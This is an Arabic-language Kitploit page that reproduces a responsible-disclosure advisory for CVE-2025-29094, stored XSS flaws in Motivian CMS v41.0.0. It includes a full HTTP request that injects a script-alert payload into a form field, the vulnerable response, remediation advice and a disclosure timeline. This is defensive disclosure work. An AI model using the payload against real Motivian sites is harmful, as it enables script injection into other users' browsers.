Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — يكشف هذا المستودع عن ثغرة أمنية تم اكتشافها في Motivian Content Management System v.41.0.0. | Kitploit
أدوات/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراقالتعلم والتعليم
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

يكشف هذا المستودع عن ثغرة أمنية تم اكتشافها في Motivian Content Management System v.41.0.0.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

CVE-2025-29094-ثغرات-متعددة-من-نوع-البرمجة-النصية-عبر-المواقع-المخزنة-XSS

يكشف هذا المستودع عن ثغرة أمنية تم اكتشافها في نظام إدارة المحتوى Motivian الإصدار 41.0.0.

  • CVE-2025-29094: ثغرات متعددة من نوع البرمجة النصية عبر المواقع المخزنة (XSS)

تم الإبلاغ عن هذه الثغرة للبائع وفقًا لممارسات الإفصاح المسؤول، وإلى MITRE، التي قامت بتعيين معرف CVE مؤقت. يتم نشر التفاصيل بعد انتهاء فترة الإفصاح البالغة 45 يومًا.

معلومات عامة

  • العنوان: Motivian: ثغرة البرمجة النصية عبر المواقع المخزنة (XSS)
  • نوع الثغرة: XSS مخزنة
  • بائع المنتج: Motivian
  • المنتج: نظام إدارة المحتوى Motivian
  • الإصدار المتأثر: Motivian CMS v.41.0.0
  • المكونات المتأثرة: Marketing/Forms، Marketing/Offers، Content/Pages
  • متجه الهجوم: عن بعد
  • التأثير: تنفيذ جافا سكريبت عشوائي في متصفح الضحية
  • الخطورة: عالية
  • درجة CVSSv3: 7.6
  • متجه CVSSv3: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • الخطورة حسب CISA-ADP: متوسطة
  • درجة CVSSv3 حسب CISA-ADP: 6.1
  • متجه CVSSv3 حسب CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • تاريخ الاكتشاف: 2025-01-29
  • بواسطة: Francesco Marcuccio
  • الحالة: تم الإبلاغ للبائع في 7 أبريل 2025 - لم يتم تلقي أي رد/إصلاح حتى 22 مايو 2025

الوصف

ثغرة البرمجة النصية عبر المواقع (XSS) في نظام إدارة المحتوى Motivian الإصدار 41.0.0 تسمح لمهاجم عن بعد بتنفيذ كود تعسفي عبر مكونات Marketing/Forms و Marketing/Offers و Content/Pages. تم استغلال الثغرة عن طريق حقن كود جافا سكريبت ضار في حقول مختلفة، بما في ذلك العنوان في Marketing/Form و Marketing/Offers، وحقل البرنامج النصي للرأس في Content/Pages

إثبات المفهوم

يمكن استغلال الثغرة عبر حقول مختلفة في مكونات متعددة. لأغراض التوضيح، يركز إثبات المفهوم التالي على سيناريو محدد:

  1. انتقل إلى قسم Marketing/Forms وأنشئ عنصر نموذج جديد.
  2. أدخل برنامجًا نصيًا ضارًا في حقل الاسم واحفظ النموذج.

فيما يلي النص الكامل لطلبات واستجابات HTTP المستخدمة لإظهار المشكلة:

طلب Burp

root@kitploit:~
POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
Host: [REDACTED]
Content-Length: 1362
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: [REDACTED]
Connection: close

targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]

استجابة Burp

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Feb 2025 12:00:09 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: it-IT
Content-Length: 94593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/HEAD/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]

المعالجة

قم بتطهير جميع مدخلات المستخدم وهروب المخرجات قبل العرض. قم بتطبيق رأس سياسة أمان المحتوى (CSP) للتخفيف من مخاطر XSS.

الجدول الزمني للإفصاح

DateAction
2025-02-06طلب معرف CVE (CNA: MITRE)
2025-04-02تعيين معرف CVE

الإسناد

  • اكتشف وأفصح عنها بمسؤولية:
    Francesco Marcuccio
    مستشار أمن سيبراني، مختبر اختراق

  • إسناد مكتشف MITRE مدرج باسم:
    Francesco Marcuccio
    مستشار أمن سيبراني، مختبر اختراق

روابط

روابط مرجعية: MITRE NIST

الحالة

معرف CVE هذا في حالة منشور رسميًا. سيتم تحديثه بدرجة CVSS من قبل NIST بعد التحليل.

تنزيل الأداة
2025-04-07تم الإبلاغ عن الثغرات للبائع
2025-05-31الإفصاح العام بعد انتهاء فترة الإفصاح البالغة 45 يومًا (إجمالي 54 يومًا)
2025-06-04التسجيل الرسمي والإدخال في قاعدة بيانات MITRE وبوابة NIST/NVD